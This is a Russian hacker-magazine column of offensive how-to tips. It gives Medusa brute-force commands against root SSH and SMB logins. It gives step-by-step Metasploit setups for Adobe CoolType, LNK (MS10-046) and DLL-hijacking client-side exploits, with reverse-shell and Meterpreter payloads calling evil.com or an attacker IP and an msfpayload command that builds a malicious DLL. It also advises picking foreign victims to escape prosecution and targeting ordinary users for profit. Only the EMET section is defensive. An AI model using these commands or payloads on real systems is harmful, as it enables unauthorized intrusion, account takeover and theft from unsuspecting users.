Задача: Пробрутить логин, пасс к POP3, FTP, SSH и т.д.

 

Решение

Брутфорс – вещь достаточно полезная и приятная, особенно когда нет каких-то четких ограничений по времени. Включил брутилку – и занимайся своими делами. А через пару дней – плоды собирай. Да и вообще, ни один пен-тест без брута не обходится. Некоторые не верят в брут (а ты веришь в брут? 🙂 Типа, подбором можно заниматься годами…

Но сервисов всяких много и по работе, и по досугу. К каждому пасс требуется знать. А обычному юзеру тяжко от этого, особенно с учетом корпоративных политик, когда каждый месяц надо что-то новое придумывать.

Потому и выбирают пароли в стиле:

123456
Password
iloveyou
princess
rockyou (название «конторы»)
abc123
Qwerty
Ashley
babygirl
monkey

Кстати, эти взяты из топа анализа 32 миллионов паролей, выполненного компанией Imperva (imperva.com/ld/password_report.asp). Тут уж грех не побрутить. А главное – и инструментарий есть.

Не считая всяких специализированных вещиц, основными брутфорсерами являются олдскульная THC-Hydra (freeworld.thc.org/thc-hydra/) и более модная Medusa (foofus.net/~jmk/medusa/medusa.html). Что приятно – и та, и другая входят в BackTrack4, хотя установка их не должна вызвать каких-то проблем (есть только *nix версии).

Во многом программы похожи: модульные, «многопоточные», с хорошо настраиваемыми возможностями. Основное различие в том, как распараллеливается процесс перебора: у Medusa – потоками, у Hydra – процессами. Что дает первой некое преимущество. Но есть еще более тонкие различия, особенно в модулях, так что желательно посмотреть сравнение возможностей тулз на foofus.net/~jmk/medusa/medusa-compare.html

Можно брутить следующее: TELNET, AFP, CVS, FTP, HTTP, HTTPS, SOCKS5, HTTP-PROXY, IMAP, MS-SQL, PostgreSQL, MySQL, NCP (NetWare), NNTP, PCNFS, PcAnywhere, POP3, rexec, rlogin, rsh, Teamspeak, SMB, SMBNT, SAP/R3, SMTP (AUTH/VRFY), SNMP, SSHv2, SVN, Telnet, VmAuthd, VNC, Cisco auth, ICQ, LDAPx и т.д.

А теперь хорошие новости: оба проекта были в неком забытьи, но теперь за них снова взялись и обещали не бросать :). Последняя версия Medusa – 2.0, Hydra – 5.7. Чего-то чрезвычайного или нового не добавили, но все же.

Пару примеров по Medus’е.
Подбираем рутовый пасс через SSH:

medusa -h victim.com -u root -P passwords.txt –M ssh

Где

  • -h, -u – задаем хост и под кем логиниться;
  • -P – список паролей для перебора;
  • -M – к какому сервису подбираем пасс.

Любой из элементов можно заменить списком или единичным значением, указав заглавную или обычную букву соответственно.

Брутим несколько хостов по SMB:

medusa -M smbnt -C combo.txt

Содержимое combo.txt имеет вид «хост:логин:пасс». Например:

192.168.0.2:administrator:password
192.168.0.2:testuser:pass
192.168.0.3:administrator:blah
192.168.0.4:user1:foopass

Возможностей по настройке брута, реально много, так что подстроить под конкретные потребности.

Кстати, для любителей мышки, есть версия гуиверсия – XHydra :).

Словари для перебора легко найти в интернете. Их там много. Например, на passwords.ru есть с заточкой под «российскую действительность». Также есть интересный проект awlg.org/index.gen, который по заданной теме составляет список релевантных слов, используя поисковики.

 

Задача: Быстро распаковать exe’шки, dll’ки

 

Решение

Наверное, каждый, кто провел за компьютером приличный кусок своей жизни, хоть раз хотел взломать какую-нибудь полюбившуюся платную программу. Узнавал о том, как это делается. Возможно, пытался. А у кого-то это даже получилось, и он стал зарабатывать этим делом себе на хлеб с маслом :). В инете по этому поводу много мануалов.

Кстати, если есть желание познать «истины социализма», то почитай цикл статей «Введение в крэкинг с нуля, используя OllyDbg» (wasm.ru/series.php?sid=17). Он большой, очень подробный, заточенный под практику и не требует каких-то особых начальных знаний. Прочтешь и поймешь – будешь на голову выше многих. Качественная вещь. Переводчикам – спасибо!

Но вернемся к задаче. Меня всегда напрягали всякие протекторы, шифровщики, пакеры у программок, когда хотелось по-быстрому поковырять функционал, пореверсить чуток. Копаться обычно времени нет. И вот, нашлось универсальное средство, решающее эти проблемы – Quick Unpack 2.2 (qunpack.ahteam.org/?p=436). Авторам – спасибо! С помощью нее можно обойти целую кучу самых распространенных шифровщиков, пакеров, протекторов, обфускаторов и восстановить исходный exe’шник. Например, восстанавливает из UPX, ASPack, PE Diminisher, PECompact, PE-PACK, PackMan, WinUPack и еще сотни других.

Из достоинств следует отметить, что восстанавливать можно также DLL’ки, есть импорт функций; можно дампить сам процесс, аттачась к нему, есть несколько OEP finder’ов, имеется поддержка скриптового языка LUA и многое другое (смотри в «хелпе»). Но это уже для тех, кто в теме :).

В основном же требуется всего пара кликов – указать файл, выбрать для него OEP finder и распаковать.

 

Задача: Получить телефонные номера мобильных юзеров

Решение: Цивилизация пришла и к нам. Такие технологии, как 3G и уже олдскульный GPRS, у всех на слуху, у всех в кармане. Поползать по сети с мобильника теперь совсем не проблема, ведь даже самые простые модели оснащены каким-то браузером. Да и тарифы операторов не кусаются. Вот только появляются косяки другого плана .

На прошедшей конференции «CanSecWest 2010» исследователь Collin Mulliner представил свои изыскания в области мобильных технологий (mulliner.org/security/feed/random_tales_mobile_hacker.pdf). Там много всего – от модификации читалок до DoS’а мобилок. Но в рамках нашей темы интересен раздел про раскрытие личной информации, такой как номер мобильника, например.

Из этого изыскания следует, что большинство операторов добавляют заголовки в HTTP-запросы. Это связано с тем, что когда ты выходишь в интернет с обычной трубки, то тебя пускают не напрямую в сеть, а через прокси, который и добавляет эти заголовки. В зависимости от оператора могут добавляться MSISDN (номер мобильного), IMEI (уникальный номер самого телефона) или IMSI (уникальный номер симки). У кого как. По сути, проблема в плохо сконфигурированных проксиках.

Зачем оно надо (в благих целях) – не совсем понятно. В злых – вариантов много, конфиденциальная информация, как-никак. Особенно с учетом того, что по мобильнику очень легко вычислить данные владельца.

Протестить своего оператора можно тут – mulliner.org/pc.cgi. Я проверил Билайн – получил номер мобильника, его модель, примерное положение. Думаю, у остальных ситуация не лучше.
Радует, что проблема касается только тех, кто ползает через ваповый инет, то есть пользователи КПК, всевозможных глазофонов и 3G-модемов могут спать спокойно, так как их не пропускают через злосчастный прокси.

 

Задача: Найти диапазоны IP-адресов по географической привязке

 

Решение

Согласись, зачастую нам все равно, кто будет нашей жертвой :). Особенно, если нам требуется получить много машин и/или мы ищем их какими-то автоматизированными способами. А чтобы защитить себя от длинных рук правосудия, мы, конечно же, используем всякие VPN’ы, проксики и другие средства для поддержания личной анонимности. Хорошим дополнением к перечисленному будет тот факт, что наши жертвы находятся в другой стане или на другом континенте. Тогда негативного фидбека можно не опасаться.

Задача на деле простая, и не совсем понятно, почему она вызывает у людей какие-то трудности.
Есть множество сайтов типа ipaddresslocation.org, worldips.info, где всего лишь требуется выбрать страну и нам покажут диапазоны IP-адресов.

К тому же, у регистраторов (RIPE, RIPN, etc.) есть поиск по базам. У RIPN’а (ru-center) он выделился в сайд-проект ipgeobase.ru. Так что мы можем найти диапазон, принадлежащий либо какой-то компании, либо какому-то конкретному лицу, либо находящийся в каком-то городе. Раздолье :). Не стоит забывать и о стандартном whois’е.

 

Задача: Включаем механизмы защиты Windows для ПО, которое их не поддерживает

 

Решение

Если ты был на CC’10, то наверняка посетил и проникся семинаром Алексея Синцова – «Обход защитных механизмов в ОС Windows». В зависимости от того, за какой баррикадой находишься ты, тебе могло стать либо радостно, либо страшно :). Доклад классный, его можно найти на party10.cc.org.ru.

Подведем итог: микрософтовцы, в общем, молодцы – внедрили в Win7 множество разных механизмов. И в определенных ситуациях можно даже создать «непробиваемую» систему. Вот только основная проблема в том, что для использования этих механизмов и само ПО, и все его модули должны быть собраны с их поддержкой.

А сторонние производители (даже гранды, например, Adobe, Mozillа) с этим грешат. В прошлом номере я писал о том, в каком широко распространенном ПО отсутствует поддержка DEP, ASLR и т.д.

Что еще хуже – конечному пользователю на это особо не повлиять. Типа, исходников нет – перекомпилить не можешь. Но так было до недавнего времени.
Возрадуемся! MS выпустила неофициальную тулзу, а точнее, ее вторую версию, которая поможет нам подключать необходимые механизмы (и даже больше) для процессов, вне зависимости от сборки программы. Имя ей – EMET 2.0, Enhanced Mitigation Experience Toolkit (blogs.technet.com/b/srd/archive/2010/09/02/enhanced-mitigation-experience-toolkit-emet-v2-0-0.aspx)

С помощью нее можно как настроить общие политики и включить DEP, SEHOP, ASLR для всей системы, так и выполнить настройки для конкретного приложения. Если точнее, то она позволяет включить для ПО и его модулей (вне зависимости от того, с какими опциями они собраны) следующие возможности: стандартные DEP, ASLR, SEHOP, а также защиту от heapspay’ев и шеллкодов.

Надо, конечно, понимать, что не все ПО будет корректно работать. Но в определенных ситуациях это помогает. Пример есть на сайте MS: 0day-эксплойт для Acrobat Reader под Win7 с обходом DEP, используя ROP, не работает, так как не-ASLR-библиотека была смещена в памяти EMET’ом (blogs.technet.com/b/srd/archive/2010/09/10/use-emet-2-0-to-block-the-adobe-0-day-exploit.aspx)

Программа работает минимум на WinXP c SP3, но поддержки SEHOP и ASLR тебе это не даст. Так что полную радость можно получить только на Win7 и Win2008.

 

Задача: Атакуем простых юзеров, используя client-side-сплоиты

 

Решение

Компьютеры теперь везде и вся. Несчастных юзеров полным-полно. Почему несчастных? Да потому что во многом они стали основной целью для «хакерских атак» :). Особенно с развитием всяких систем переводов, интернет-банкинга и других видов электронных денег. Теперь снять профит с обычного юзера – не проблема. И это уже не считая классики типа спама, ботнетов, DoS’ов, кражи конфиденциально информации. Антивирусы, фаеры, IDS’ы, системы обновления ПО, сэндбоксы спасают только небольшую толпу продвинутых юзеров/фирм, так как их надо и настроить, и правильно реагировать на угрозы, и купить само ПО. В итоге имеем широкий выбор из миллионов менеджеров/бухгалтеров для «работы» с ними :).

А тут еще и реально критические уязвимости от таких контор, как Microsoft и Adobe, чье ПО является де-факто стандартом по миру. Да, в этом смысле лето было богатым!
В качестве примера я приведу три сплоита: Adobe Acrobat PDF Cooltype Sing (версии <=9.3.4/8.2.4), MS DLL Hijacking, MS LNK сплоит(MS10-046). Описание подробностей сплоитов ты можешь прочитать в «Обзоре эксплойтов» от Алексея Синцова в этом и в прошлом номерах.

Как ни странно, все примеры реализованы с помощью Metasploit Framework. Тут надо отдать должное создателям MSF – они чрезвычайно быстро стали добавлять сплоиты к самым массовым критическим уязвимостям. Некоторые реализации уязвимостей и вовсе появляются сразу в MSF, без сторонних PoC’ов. Все три перечисленные уязвимости были 0-day, когда попали в MSF. Сейчас уже есть кое-какие патчи, но вернемся к делу.

1) Adobe Acrobat PDF Cooltype Sing. Adobe этим летом дал миру несколько суровых дыр. Это одна из них. Заходим в msfconsole и:

Выбираем сплоит:

msf > use exploit/windows/fileformat/adobe_cooltype_sing

Задаем имя файла:

msf > set FILENAME xakep_ubileinyi_vypusk.pdf

Куда сохраняем? В home:

msf > set OUTPUTPATH ~

Выбираем нагрузку и ее настройки:

msf > set PAYLOAD windows/shell/reverse_tcp
msf > set LHOST evil.com
msf > set LPORT 80

Теперь на наш evil.com вешаем netcat, например, и посылаем жертве файлик по почте.
Простой реверсовый шелл нужен, во-первых, чтобы обойти NAT, файер, а во-вторых, чтобы не привязываться к процессу (чтобы соединение не оборвалось при закрытии Acrobat Reader’а).

Есть аналогичный сплоит, но проводящий атаку через браузер и Adobe’овский плагин к нему – exploit/windows/browser/adobe_cooltype_sing.

2) MS LNK сплоит (MS10-046). Сплоит из разряда фич 🙂

Выбираем сплоит:

msf >use windows/browser/ms10_046_shortcut_icon_dllloader

Настраиваем пэйлоад:

msf >set PAYLOAD windows/meterpreter/reverse_tcp
msf >set LHOST 192.168.0.101

По сути, сплоит поднимает WebDAV и кидает туда ярлыки. В результате либо даем бедному пользователю полученную ссылку, либо делаем ярлычок на ресурс. То есть сплоит из локального стал удаленным (через шару и WebDAV). Павним бедного юзера – ему вряд ли что-то поможет :).
Злую DLL’ку для этого и следующего сплоита можно создать и ручками. Ярлычок, понятное дело, тоже.

$msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.101 D > evil.dll

Где

  • windows/meterpreter/reverse_tcp – название нагрузки,
  • LHOST=192.168.0.101 – настройки
  • D – указываем, что создаем DLL’ку;
  • evil.dll – имя итогового файла.

3) MS DLL Hijacking

Это очень забавная вещь! С ее помощью мы фактически можем «превратить» любой миролюбивый формат файла во что-то злое. Пришлют тебе файлы с какой-нибудь презентацией или чертежами AutoCAD’а, например. А среди них какая-то библиотечка валяется. Бывает ведь. Ты, конечно же, запустишь сам чертеж, а тут – бац! – и у тебя бэкдор. Хорошее дело!
Подробное описание «почему и зачем так» смотри на следующей странице у Алексея Синцова :).

А теперь – немного практики.

Выбираем сплоит:

msf > use windows/browser/webdav_dll_hijacker

Задаем имя файлов:

msf > set BASENAME policy

Задаем расширение файла:

msf > set EXTENSIONS ppt

Имя для шары:

msf > set SHARENAME docs

Нагрузка:

msf > set PAYLOAD windows/meterpreter/bind_tcp

После этого либо впариваем жертве ссылку на шару – \\192.168.0.101\docs\, либо на HTTP-сервак – http://192.168.0.101:80. Жертва открывает файлик – мы получаем шелл. Честный обмен :).

Опять же, по сути, локальная уязвимость превратилась в удаленную за счет шары и WebDAV. Вот такими тремя client-site багами мы можем положить на лопатки все версии Windows, от XP до 7. Антивири и файеры – тоже не помеха при небольших доработках методов :).

 

INFO

Все описанные программы и файл со ссылками во всей рубрике ищи на диске.

Оставить мнение

Check Also

Жизнь без антивируса. Как побороть малварь голыми руками и обезопасить себя на будущее

На вопрос «Какой антивирус вы используете на своей виндовой машине?» многие безопасники (в…